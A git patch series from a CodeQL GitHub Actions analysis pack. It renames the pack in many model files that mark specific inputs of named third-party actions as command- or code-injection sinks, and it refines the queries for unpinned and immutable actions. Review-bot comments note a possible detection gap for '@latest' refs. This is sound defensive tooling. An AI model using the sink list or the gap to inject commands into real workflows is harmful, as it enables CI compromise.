 - ["preactjs/compressed-size-action", "*", "input.build-script", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/py-actions_flake8.model.yml b/ql/lib/ext/manual/py-actions_flake8.model.yml
index 76b0c1d7d32..d9edf347c33 100644
--- a/ql/lib/ext/manual/py-actions_flake8.model.yml
+++ b/ql/lib/ext/manual/py-actions_flake8.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["py-actions/flake8", "*", "input.flake8-version", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/py-actions_py-dependency-install.model.yml b/ql/lib/ext/manual/py-actions_py-dependency-install.model.yml
index 587519e948b..ce637b1b0c5 100644
--- a/ql/lib/ext/manual/py-actions_py-dependency-install.model.yml
+++ b/ql/lib/ext/manual/py-actions_py-dependency-install.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["py-actions/py-dependency-install", "*", "input.path", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/pyo3_maturin-action.model.yml b/ql/lib/ext/manual/pyo3_maturin-action.model.yml
index 58cbf9cc742..95d63525c57 100644
--- a/ql/lib/ext/manual/pyo3_maturin-action.model.yml
+++ b/ql/lib/ext/manual/pyo3_maturin-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["pyo3/maturin-action", "*", "input.before-script-linux", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/reactivecircus_android-emulator-runner.model.yml b/ql/lib/ext/manual/reactivecircus_android-emulator-runner.model.yml
index cc39018b9b1..d89f4582f67 100644
--- a/ql/lib/ext/manual/reactivecircus_android-emulator-runner.model.yml
+++ b/ql/lib/ext/manual/reactivecircus_android-emulator-runner.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["reactivecircus/android-emulator-runner", "*", "input.api-level", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/read-file-actions.model.yml b/ql/lib/ext/manual/read-file-actions.model.yml
index 3d92eaef263..27130231df9 100644
--- a/ql/lib/ext/manual/read-file-actions.model.yml
+++ b/ql/lib/ext/manual/read-file-actions.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["juliangruber/read-file-action", "*", "artifact", "output.content", "taint", "manual"]
diff --git a/ql/lib/ext/manual/redhat-plumbers-in-action_download-artifact.model.yml b/ql/lib/ext/manual/redhat-plumbers-in-action_download-artifact.model.yml
index a0b5bc0dee4..9157cec03dd 100644
--- a/ql/lib/ext/manual/redhat-plumbers-in-action_download-artifact.model.yml
+++ b/ql/lib/ext/manual/redhat-plumbers-in-action_download-artifact.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 - ["redhat-plumbers-in-action/download-artifact", "*", "output.*", "artifact", "manual"]
diff --git a/ql/lib/ext/manual/reggionick_s3-deploy.model.yml b/ql/lib/ext/manual/reggionick_s3-deploy.model.yml
index 89d91208ad4..359c3b0e222 100644
--- a/ql/lib/ext/manual/reggionick_s3-deploy.model.yml
+++ b/ql/lib/ext/manual/reggionick_s3-deploy.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["reggionick/s3-deploy", "*", "input.bucket", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/release-kit_regex.model.yml b/ql/lib/ext/manual/release-kit_regex.model.yml
index 5b2e5d9c4eb..8534ccc599a 100644
--- a/ql/lib/ext/manual/release-kit_regex.model.yml
+++ b/ql/lib/ext/manual/release-kit_regex.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["release-kit/regex", "*", "input.string", "output.*", "taint", "manual"]
diff --git a/ql/lib/ext/manual/renovatebot_github-action.model.yml b/ql/lib/ext/manual/renovatebot_github-action.model.yml
index 65a4cc60652..136e4aa9e41 100644
--- a/ql/lib/ext/manual/renovatebot_github-action.model.yml
+++ b/ql/lib/ext/manual/renovatebot_github-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["renovatebot/github-action", "*", "input.renovate-image", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/rishabh510_path-lister-action.model.yml b/ql/lib/ext/manual/rishabh510_path-lister-action.model.yml
index 281602cf0c7..428115a7bd7 100644
--- a/ql/lib/ext/manual/rishabh510_path-lister-action.model.yml
+++ b/ql/lib/ext/manual/rishabh510_path-lister-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 # https://github.com/Rishabh510/Path-lister-action
diff --git a/ql/lib/ext/manual/roots_issue-closer-action.model.yml b/ql/lib/ext/manual/roots_issue-closer-action.model.yml
index d82962aa096..be313c01711 100644
--- a/ql/lib/ext/manual/roots_issue-closer-action.model.yml
+++ b/ql/lib/ext/manual/roots_issue-closer-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["roots/issue-closer-action", "*", "input.issue-close-message", "code-injection", "manual"]
diff --git a/ql/lib/ext/manual/ros-tooling_setup-ros.model.yml b/ql/lib/ext/manual/ros-tooling_setup-ros.model.yml
index 32622271d6a..74e55a9bf4e 100644
--- a/ql/lib/ext/manual/ros-tooling_setup-ros.model.yml
+++ b/ql/lib/ext/manual/ros-tooling_setup-ros.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["ros-tooling/setup-ros", "*", "input.required-ros-distributions", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/ruby_setup-ruby.model.yml b/ql/lib/ext/manual/ruby_setup-ruby.model.yml
index 8dbc5ee2ade..785616390b3 100644
--- a/ql/lib/ext/manual/ruby_setup-ruby.model.yml
+++ b/ql/lib/ext/manual/ruby_setup-ruby.model.yml
@@ -1,11 +1,11 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["ruby/setup-ruby", "*", "input.ruby-version", "output.ruby-prefix", "taint", "manual"]
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["ruby/setup-ruby", "*", "input.ruby-version", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/salsify_action-detect-and-tag-new-version.model.yml b/ql/lib/ext/manual/salsify_action-detect-and-tag-new-version.model.yml
index 0bbd6364b5e..06de2990adf 100644
--- a/ql/lib/ext/manual/salsify_action-detect-and-tag-new-version.model.yml
+++ b/ql/lib/ext/manual/salsify_action-detect-and-tag-new-version.model.yml
@@ -1,11 +1,11 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["salsify/action-detect-and-tag-new-version", "*", "input.tag-template", "output.tag", "taint", "manual"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["salsify/action-detect-and-tag-new-version", "*", "input.version-command", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/sergeysova_jq-action.model.yml b/ql/lib/ext/manual/sergeysova_jq-action.model.yml index 6d6ec4a393e..a2ca3eae784 100644 --- a/ql/lib/ext/manual/sergeysova_jq-action.model.yml +++ b/ql/lib/ext/manual/sergeysova_jq-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["sergeysova/jq-action", "*", "input.cmd", "code-injection", "manual"] diff --git a/ql/lib/ext/manual/shallwefootball_upload-s3-action.model.yml b/ql/lib/ext/manual/shallwefootball_upload-s3-action.model.yml index 78737c6bb8b..962c7431b75 100644 --- a/ql/lib/ext/manual/shallwefootball_upload-s3-action.model.yml +++ b/ql/lib/ext/manual/shallwefootball_upload-s3-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["shallwefootball/upload-s3-action", "*", "input.destination_dir", "output.object_key", "taint", "manual"] diff --git a/ql/lib/ext/manual/shogo82148_actions-setup-perl.model.yml b/ql/lib/ext/manual/shogo82148_actions-setup-perl.model.yml index 64d5aac33ab..ebe62b37a6f 100644 --- a/ql/lib/ext/manual/shogo82148_actions-setup-perl.model.yml +++ b/ql/lib/ext/manual/shogo82148_actions-setup-perl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["shogo82148/actions-setup-perl", "*", "input.working-directory", "env.PERL5LIB", "taint", "manual"] 
diff --git a/ql/lib/ext/manual/skitionek_notify-microsoft-teams.model.yml b/ql/lib/ext/manual/skitionek_notify-microsoft-teams.model.yml index c921df3fa7d..64d8ec1b7a5 100644 --- a/ql/lib/ext/manual/skitionek_notify-microsoft-teams.model.yml +++ b/ql/lib/ext/manual/skitionek_notify-microsoft-teams.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["skitionek/notify-microsoft-teams", "*", "input.overwrite", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/manual/snow-actions_eclint.model.yml b/ql/lib/ext/manual/snow-actions_eclint.model.yml index 623483db63e..49ba12d47a2 100644 --- a/ql/lib/ext/manual/snow-actions_eclint.model.yml +++ b/ql/lib/ext/manual/snow-actions_eclint.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["snow-actions/eclint", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/stackhawk_hawkscan-action.model.yml b/ql/lib/ext/manual/stackhawk_hawkscan-action.model.yml index 5184c3c4c48..396c480c4cd 100644 --- a/ql/lib/ext/manual/stackhawk_hawkscan-action.model.yml +++ b/ql/lib/ext/manual/stackhawk_hawkscan-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["stackhawk/hawkscan-action", "*", "input.workspace", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/step-security_harden-runner.model.yml b/ql/lib/ext/manual/step-security_harden-runner.model.yml index c898d41c838..129c8beb020 100644 --- a/ql/lib/ext/manual/step-security_harden-runner.model.yml +++ b/ql/lib/ext/manual/step-security_harden-runner.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["step-security/harden-runner", "*", "input.allowed-endpoints", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/suisei-cn_actions-download-file.model.yml b/ql/lib/ext/manual/suisei-cn_actions-download-file.model.yml index d7c874c7787..343c0efe42a 100644 --- a/ql/lib/ext/manual/suisei-cn_actions-download-file.model.yml +++ b/ql/lib/ext/manual/suisei-cn_actions-download-file.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["suisei-cn/actions-download-file", "*", "input.filename", "output.filename", "taint", "manual"] diff --git a/ql/lib/ext/manual/the-coding-turtle_ga-file-list.model.yml b/ql/lib/ext/manual/the-coding-turtle_ga-file-list.model.yml index 7daafbc2fd8..6ca3eb0c160 100644 --- a/ql/lib/ext/manual/the-coding-turtle_ga-file-list.model.yml +++ b/ql/lib/ext/manual/the-coding-turtle_ga-file-list.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: # https://github.com/the-coding-turtle/ga-file-list diff --git a/ql/lib/ext/manual/tibdex_backport.model.yml b/ql/lib/ext/manual/tibdex_backport.model.yml index 398dfb5c766..956c9afc8e4 100644 --- a/ql/lib/ext/manual/tibdex_backport.model.yml +++ b/ql/lib/ext/manual/tibdex_backport.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["tibdex/backport", "*", "input.body_template", "code-injection", "manual"] diff --git a/ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml b/ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml index a0dfb648875..e49643d1f15 100644 --- a/ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml +++ b/ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["tim-actions/get-pr-commits", "*", "output.commits", "text", "manual"] diff --git a/ql/lib/ext/manual/timheuer_base64-to-file.model.yml b/ql/lib/ext/manual/timheuer_base64-to-file.model.yml index 872964f8215..c9b65a30379 100644 --- a/ql/lib/ext/manual/timheuer_base64-to-file.model.yml +++ b/ql/lib/ext/manual/timheuer_base64-to-file.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["timheuer/base64-to-file", "*", "input.fileName", "output.filePath", "taint", "manual"] diff --git a/ql/lib/ext/manual/tj-actions_branch-names.model.yml b/ql/lib/ext/manual/tj-actions_branch-names.model.yml index 56f017635ce..386142a2d12 100644 --- a/ql/lib/ext/manual/tj-actions_branch-names.model.yml +++ b/ql/lib/ext/manual/tj-actions_branch-names.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: # https://github.com/tj-actions/branch-names diff --git a/ql/lib/ext/manual/tmelliottjr_extract-regex-action.model.yml b/ql/lib/ext/manual/tmelliottjr_extract-regex-action.model.yml index 73fd66c11b9..3cfedbdec2c 100644 --- a/ql/lib/ext/manual/tmelliottjr_extract-regex-action.model.yml +++ b/ql/lib/ext/manual/tmelliottjr_extract-regex-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["tmelliottjr/extract-regex-action", "*", "input.input", "output.resultString", "taint", "manual"] diff --git a/ql/lib/ext/manual/trilom_file-changes-action.model.yml b/ql/lib/ext/manual/trilom_file-changes-action.model.yml index 79a12582e9e..9d5b8b88ce2 100644 --- a/ql/lib/ext/manual/trilom_file-changes-action.model.yml +++ b/ql/lib/ext/manual/trilom_file-changes-action.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["trilom/file-changes-action", "*", "output.files", "filename", "manual"] diff --git a/ql/lib/ext/manual/tripss_conventional-changelog-action.model.yml b/ql/lib/ext/manual/tripss_conventional-changelog-action.model.yml index a534e3dfcf7..3893986830a 100644 --- a/ql/lib/ext/manual/tripss_conventional-changelog-action.model.yml +++ b/ql/lib/ext/manual/tripss_conventional-changelog-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["tripss/conventional-changelog-action", "*", "input.pre-release-identifier", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/tryghost_action-deploy-theme.model.yml b/ql/lib/ext/manual/tryghost_action-deploy-theme.model.yml index dfaa2e2687d..f2f99cc744a 100644 --- a/ql/lib/ext/manual/tryghost_action-deploy-theme.model.yml +++ b/ql/lib/ext/manual/tryghost_action-deploy-theme.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["tryghost/action-deploy-theme", "*", "input.theme-name", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/tzkhan_pr-update-action.model.yml b/ql/lib/ext/manual/tzkhan_pr-update-action.model.yml index f87beb15018..5a226f12103 100644 --- a/ql/lib/ext/manual/tzkhan_pr-update-action.model.yml +++ b/ql/lib/ext/manual/tzkhan_pr-update-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["tzkhan/pr-update-action", "*", "output.headMatch", "branch", "manual"] diff --git a/ql/lib/ext/manual/veracode_veracode-sca.model.yml b/ql/lib/ext/manual/veracode_veracode-sca.model.yml index 59cc155b550..d3e1daae67a 100644 --- a/ql/lib/ext/manual/veracode_veracode-sca.model.yml 
+++ b/ql/lib/ext/manual/veracode_veracode-sca.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["veracode/veracode-sca", "*", "input.url", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/w3f_action-find-old-files.model.yml b/ql/lib/ext/manual/w3f_action-find-old-files.model.yml index 38d892966d4..91a9ad11aa6 100644 --- a/ql/lib/ext/manual/w3f_action-find-old-files.model.yml +++ b/ql/lib/ext/manual/w3f_action-find-old-files.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: # https://github.com/w3f/action-find-old-files diff --git a/ql/lib/ext/manual/wearerequired_lint-action.model.yml b/ql/lib/ext/manual/wearerequired_lint-action.model.yml index 52dcff39903..b1f8b91a22d 100644 --- a/ql/lib/ext/manual/wearerequired_lint-action.model.yml +++ b/ql/lib/ext/manual/wearerequired_lint-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["wearerequired/lint-action", "*", "input.git_name", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/webfactory_ssh-agent.model.yml b/ql/lib/ext/manual/webfactory_ssh-agent.model.yml index f9e122c17a9..48b11c1c5b2 100644 --- a/ql/lib/ext/manual/webfactory_ssh-agent.model.yml +++ b/ql/lib/ext/manual/webfactory_ssh-agent.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["webfactory/ssh-agent", "*", "input.ssh-agent-cmd", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/xom9ikk_dotenv.model.yml b/ql/lib/ext/manual/xom9ikk_dotenv.model.yml index bfbd4e2f729..1ed8c0fd3f7 100644 --- a/ql/lib/ext/manual/xom9ikk_dotenv.model.yml +++ b/ql/lib/ext/manual/xom9ikk_dotenv.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["xom9ikk/dotenv", "*", "artifact", "envvar-injection", "manual"] diff --git a/ql/lib/ext/manual/xt0rted_pull-request-comment-branch.model.yml b/ql/lib/ext/manual/xt0rted_pull-request-comment-branch.model.yml index e4b34c37d70..bfbd1dd12e6 100644 --- a/ql/lib/ext/manual/xt0rted_pull-request-comment-branch.model.yml +++ b/ql/lib/ext/manual/xt0rted_pull-request-comment-branch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["xt0rted/pull-request-comment-branch", "*", "output.head_ref", "branch", "manual"] diff --git a/ql/lib/ext/manual/yumemi-inc_changed-files.model.yml b/ql/lib/ext/manual/yumemi-inc_changed-files.model.yml index c65f7b1055f..db61e9171a8 100644 --- a/ql/lib/ext/manual/yumemi-inc_changed-files.model.yml +++ b/ql/lib/ext/manual/yumemi-inc_changed-files.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: # https://github.com/yumemi-inc/changed-files diff --git a/ql/lib/ext/manual/zaproxy_action-baseline.model.yml b/ql/lib/ext/manual/zaproxy_action-baseline.model.yml index 91df4767a72..309045ee58d 100644 --- a/ql/lib/ext/manual/zaproxy_action-baseline.model.yml +++ b/ql/lib/ext/manual/zaproxy_action-baseline.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["zaproxy/action-baseline", "*", "input.docker_name", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/zaproxy_action-full-scan.model.yml b/ql/lib/ext/manual/zaproxy_action-full-scan.model.yml index 57f76c8cb4a..9da3749ebe4 100644 --- a/ql/lib/ext/manual/zaproxy_action-full-scan.model.yml +++ b/ql/lib/ext/manual/zaproxy_action-full-scan.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["zaproxy/action-full-scan", "*", "input.docker_name", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/zentered_issue-forms-body-parser.model.yml b/ql/lib/ext/manual/zentered_issue-forms-body-parser.model.yml index 1a40a634118..0cce7cc0cff 100644 --- a/ql/lib/ext/manual/zentered_issue-forms-body-parser.model.yml +++ b/ql/lib/ext/manual/zentered_issue-forms-body-parser.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["zentered/issue-forms-body-parser", "*", "input.body", "output.data", "taint", "manual"] From e8ee798ffaa5a7f303f6af7ffb0a5cb956932222 Mon Sep 17 00:00:00 2001 From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Thu, 7 Nov 2024 15:29:28 -0500 Subject: [PATCH 0693/1267] add temporary immutable actions doc page --- ql/src/Security/CWE-829/UnversionedImmutableAction.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/src/Security/CWE-829/UnversionedImmutableAction.md b/ql/src/Security/CWE-829/UnversionedImmutableAction.md index 754fe75b62b..33701ec27e6 100644 --- a/ql/src/Security/CWE-829/UnversionedImmutableAction.md +++ b/ql/src/Security/CWE-829/UnversionedImmutableAction.md 
@@ -7,7 +7,7 @@ of the action stored in the GitHub package registry. The action code will not ch ## Recommendations -When using [immutable actions]() use the full semantic version of the action. This will ensure that the action is resolved to the exact version stored in the GitHub package registry. This will prevent the action code from changing between runs. +When using [immutable actions](https://github.com/github/package-registry-team/blob/main/docs/immutable-actions/immutable-actions-howto.md) use the full semantic version of the action. This will ensure that the action is resolved to the exact version stored in the GitHub package registry. This will prevent the action code from changing between runs. ## Examples From d6e38d5e83e162955f24ba5db5c2f84a0bbd466d Mon Sep 17 00:00:00 2001 From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Fri, 8 Nov 2024 11:51:25 -0500 Subject: [PATCH 0694/1267] Do not detect immutable actions in UnpinnedActionsTag * these should be handles by the UseOfUnversionedImmutableAction.qll query instead * factor out immutableAction detection for reuse in both queries * octokit should not longer ping in UnpinnedActionsTag --- .../actions/security/UseOfUnversionedImmutableAction.qll | 8 ++++++-- ql/src/Security/CWE-829/UnpinnedActionsTag.md | 2 +- ql/src/Security/CWE-829/UnpinnedActionsTag.ql | 8 +++++--- .../Security/CWE-829/UnpinnedActionsTag.expected | 5 ----- 4 files changed, 12 insertions(+), 11 deletions(-) diff --git a/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll b/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll index 2fd47e3f8e1..bd14b674920 100644 --- a/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll +++ b/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll 
@@ -4,8 +4,7 @@ class UnversionedImmutableAction extends UsesStep { string immutable_action; UnversionedImmutableAction() { - immutableActionsDataModel(immutable_action) and - this.getCallee() = immutable_action and + isImmutableAction(this, immutable_action) and not isSemVer(this.getVersion()) } } @@ -23,3 +22,8 @@ predicate isSemVer(string version) { // or latest which will work or version = "latest" } + +predicate isImmutableAction(UsesStep actionStep, string actionName) { + immutableActionsDataModel(actionName) and + actionStep.getCallee() = actionName +} diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.md b/ql/src/Security/CWE-829/UnpinnedActionsTag.md index eab708f8602..d7c114f0404 100644 --- a/ql/src/Security/CWE-829/UnpinnedActionsTag.md +++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.md @@ -6,7 +6,7 @@ Using a tag for a 3rd party Action that is not pinned to a commit can lead to ex ## Recommendations -Pinning an action to a full length commit SHA is currently the only way to use an action as an immutable release. Pinning to a particular SHA helps mitigate the risk of a bad actor adding a backdoor to the action's repository, as they would need to generate a SHA-1 collision for a valid Git object payload. When selecting a SHA, you should verify it is from the action's repository and not a repository fork. +Pinning an action to a full length commit SHA is currently the only way to use a non-immutable action as an immutable release. Pinning to a particular SHA helps mitigate the risk of a bad actor adding a backdoor to the action's repository, as they would need to generate a SHA-1 collision for a valid Git object payload. When selecting a SHA, you should verify it is from the action's repository and not a repository fork. ## Examples diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql index e0e668edfa8..de8d3c2078a 100644 --- a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql 
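Review bot: The new top-level predicate `isImmutableAction`, added in the second hunk of UseOfUnversionedImmutableAction.qll, has no QLDoc, although this commit also imports it into UnpinnedActionsTag.ql, where it suppresses alerts. I would add `/** Holds if actionStep calls an action whose name actionName is listed in immutableActionsDataModel. */` above it. The doc should also say that the match is on the callee name only and does not check the ref the step uses, because a caller that treats a match as "safe to skip" needs to know that. The predicate is complete within the hunk; `isSemVer`, which the class still relies on, begins outside it.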
+++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql @@ -1,6 +1,6 @@ /** - * @name Unpinned tag for 3rd party Action in workflow - * @description Using a tag for a 3rd party Action that is not pinned to a commit can lead to executing an untrusted Action through a supply chain attack. + * @name Unpinned tag for a non-immutable Action in workflow + * @description Using a tag for a non-immutable Action that is not pinned to a commit can lead to executing an untrusted Action through a supply chain attack. * @kind problem * @security-severity 5.0 * @problem.severity recommendation @@ -12,6 +12,7 @@ */ import actions +import codeql.actions.security.UseOfUnversionedImmutableAction bindingset[version] private predicate isPinnedCommit(string version) { version.regexpMatch("^[A-Fa-f0-9]{40}$") } @@ -32,7 +33,8 @@ where ) and uses.getVersion() = version and not isTrustedOrg(repo) and - not isPinnedCommit(version) + not isPinnedCommit(version) and + not isImmutableAction(uses, repo) select uses.getCalleeNode(), "Unpinned 3rd party Action '" + name + "' step $@ uses '" + repo + "' with ref '" + version + "', not a pinned commit hash", uses, uses.toString() diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index aa19c08f2f0..848962e26bd 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected 
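Review bot: In the third hunk of UnpinnedActionsTag.ql, `not isImmutableAction(uses, repo)` removes every listed action from this query whatever ref it uses, so coverage for those steps now depends entirely on UnversionedImmutableAction, whose `isSemVer` accepts `version = "latest"` (context lines of the .qll hunk in this commit). A listed action referenced as `@latest` would therefore be reported by neither query; whether `latest` is a moving reference in the package registry is not visible here and should be confirmed. If it can move, keep it in scope with `not (isImmutableAction(uses, repo) and version != "latest")`, or drop `latest` from `isSemVer`. The alert text still reads `Unpinned 3rd party Action` while `@name` now says non-immutable, and the `where` clause starts outside the hunk, so how `repo` is bound is not shown.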
@@ -10,12 +10,7 @@ | .github/workflows/issue_comment_3rd_party_action.yml:14:15:14:52 | xt0rted/pull-request-comment-branch@v2 | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Uses Step: comment-branch | | .github/workflows/issue_comment_3rd_party_action.yml:27:15:27:52 | xt0rted/pull-request-comment-branch@v2 | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Uses Step: comment-branch | | .github/workflows/issue_comment_3rd_party_action.yml:41:15:41:42 | eficode/resolve-pr-refs@main | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'eficode/resolve-pr-refs' with ref 'main', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Uses Step: refs | -| .github/workflows/issue_comment_octokit2.yml:13:15:13:41 | octokit/request-action@v2.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit2.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | -| .github/workflows/issue_comment_octokit2.yml:20:15:20:43 | octokit/request-action@v2.x.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x.x', not a pinned commit hash | .github/workflows/issue_comment_octokit2.yml:19:9:26:6 | Uses Step: 